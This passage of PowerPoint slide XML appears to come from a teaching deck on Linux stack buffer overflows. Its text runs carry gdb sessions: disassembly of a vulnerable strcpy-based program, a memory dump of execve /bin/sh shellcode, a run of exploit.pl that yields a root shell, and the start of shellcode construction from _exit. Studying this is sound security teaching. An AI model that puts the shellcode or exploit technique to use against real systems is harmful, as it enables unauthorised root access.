                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Loaded symbols for /lib/tls/libc.so.6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Reading symbols from /lib/ld-linux.so.2...done.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Loaded symbols for /lib/ld-linux.so.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xffffe002 in ?? ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function main:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048394 &lt;main+0&gt;:    push   %ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048395 &lt;main+1&gt;:    mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048397 &lt;main+3&gt;:    sub    $0x18,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804839a &lt;main+6&gt;:    and    $0xfffffff0,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804839d &lt;main+9&gt;:    mov    $0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483a2 &lt;main+14&gt;:   sub    %eax,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483a4 &lt;main+16&gt;:   sub    $0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483a7 &lt;main+19&gt;:   mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483aa &lt;main+22&gt;:   add    $0x4,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483ad &lt;main+25&gt;:   pushl  (%eax)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483af &lt;main+27&gt;:   lea    0xffffffe8(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483b2 &lt;main+30&gt;:   push   %eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483b3 &lt;main+31&gt;:   call   0x80482d4 &lt;strcpy&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483b8 &lt;main+36&gt;:   add    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483bb &lt;main+39&gt;:   sub    $0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483be &lt;main+42&gt;:   lea    0xffffffe8(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483c1 &lt;main+45&gt;:   push   %eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483c2 &lt;main+46&gt;:   push   $0x8048484</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483c7 &lt;main+51&gt;:   call   0x80482c4 &lt;printf&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483cc &lt;main+56&gt;:   add    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483cf &lt;main+59&gt;:   call   0x80482a4 &lt;getchar&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d4 &lt;main+64&gt;:   leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d5 &lt;main+65&gt;:   ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d6 &lt;main+66&gt;:   nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d7 &lt;main+67&gt;:   nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1, 0x080483d4 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/20x  0xbfffffb8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffb8:     0x6852d231      0x68732f6e      0x622f2f68      0x52e38969</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffc8:     0x8de18953      0x80cd0b42      0x6f682f00      0x622f656d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffd8:     0x635f666f      0x7365646f      0x6e696c2f      0x732f7875</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffe8:     0x6b636174      0x776f6c66      0x6c75762f      0x6172656e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffff8:     0x00656c62      0x00000000      Cannot access memory at address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xc0000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/s  0xbfffffb8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffb8:      "1ÒRhn/shh//bi\211ãRS\211á\215B\vÍ\200"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffd1:      "/home/bof_codes/linux/stack/vulnerable"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffffc:      ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffffd:      ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffffe:      ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffff:      ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xc0000000:      &lt;Address 0xc0000000 out of bounds&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Continuing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Program received signal SIGTRAP, Trace/breakpoint trap.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x40000be0 in _start () from /lib/ld-linux.so.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Continuing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# perl exploit.pl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[+] Using ret shellcode 0xbfffffb8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>???¿¸??¿¸??¿¸??¿¸??¿¸??¿¸??¿¸???</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8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DD9038-BE50-4849-9002-D59BF1CD5F2A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284674" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gcc -static -o exit exit.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gdb exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass _exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function _exit:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9bc &lt;_exit+0&gt;:   mov    0x4(%esp,1),%ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9c0 &lt;_exit+4&gt;:   mov    $0xfc,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9c5 &lt;_exit+9&gt;:   int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9c7 &lt;_exit+11&gt;:  mov    $0x1,%eax</a:t>
            </a:r>
